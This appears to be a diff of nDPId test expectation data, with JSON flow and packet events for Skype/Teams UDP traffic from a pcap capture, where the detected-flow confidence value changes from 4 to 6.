00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2CdUAAEAR8anAqAEib91NkTLdnFgAIo9yewcCvaqOUinZ3k4PRY4yBX99xmfLU0z2qZs="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA54bUAAEARt2bAqAEinTeCljLdnEcAJaaFewkCIUNJcqobuUolNpafXbellV+EM\/ULmpysjyw="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAABBP+oAAEARp7DAqAEinTg0DzLdnFsALYwJewsCVNeDMJHHK\/Dt9HVlBuPPBbINu9bDjb8MSpCCrsrjyd0TEg=="} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mUYAAEARls7AqAEinTfrojLdnGEAICOXew0CZW2\/4VtO8SUcLK6ApfNDe+uaEMsE"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6nacAAEARXcXAqAEib91NnzLdnF8AJrQGew8Ci4JWnsKyT6r3gHVnkQ4+dXrvzbvknlDqGmE\/"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAABB8NoAAEARcG\/AqAEiQAQXlDLdnF0ALRa1exECrGOk9zKZhpR5Z4LrruV\/92iAsqS9CAawX8X4D80kRASy7Q=="} 
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6wW8AAEARn+fAqAEiQAQXjjLdnFcAJg\/KexMCQ3jYuEugpNmWmUQtEzO7LdTOeKZd1ItpRQQC"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03zwAAEARghzAqAEiQAQXkjLdgQkAIIDZexUCZ4W5ZqoZlNOePqUvRCFg3WRtDoC9"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/GZwAAEARf3vAqAEinTeClTLdnEsAK1wIexcCaeXnH1khWR2dVjoEFgFOwJFG48UKy+DykqMrgwb0UzA="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABBOycAAEARwEbAqAEib91NlzLdnF0ALQ\/xexkCYPXpRAQdHH0\/jNHVbGCv27qhgsGUdDsPAuuhBF8LGQtOxA=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5UAAEARk+DAqAEi1cezpTLdnEQALDM7exsCCwiB5Tp\/+eOgtAg8Bibngtvk3Z9waqj3cY7b3c6tDEmT"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 